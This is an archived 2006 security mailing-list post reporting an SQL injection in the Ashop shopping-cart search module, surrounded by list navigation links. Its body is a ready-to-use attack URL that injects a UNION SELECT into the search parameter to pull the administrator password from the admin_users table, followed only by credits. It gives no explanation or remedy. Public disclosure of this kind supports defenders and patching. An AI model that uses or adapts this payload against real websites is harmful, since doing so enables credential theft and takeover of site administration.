Ashop Search Module SQL injection

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Subject: Ashop Search Module SQL injection
From: entrika_fs@xxxxxxxxx
Date: 13 Jun 2006 16:48:55 -0000

http://[SITE]/default.asp?mod=search&type=simple&q=%27+union+select+1%2Cadmin_password%2C3%2C4+from+admin_users+%27+&cmdSearch=Search

credits: EntriKa & The_BeKiR & erne

Follow-Ups:
- Re: Ashop Search Module SQL injection
  - From: security curmudgeon

Prev by Date: webcrawler.com - XSS vulnerability in search-engine
Next by Date: Ratescene.co.uk - XSS with session disclosure
Previous by thread: webcrawler.com - XSS vulnerability in search-engine
Next by thread: Re: Ashop Search Module SQL injection
Index(es):
- Date
- Thread

[Index of Archives] [Linux Security] [Netfilter] [PHP] [Yosemite News] [Linux Kernel]

Powered by Linux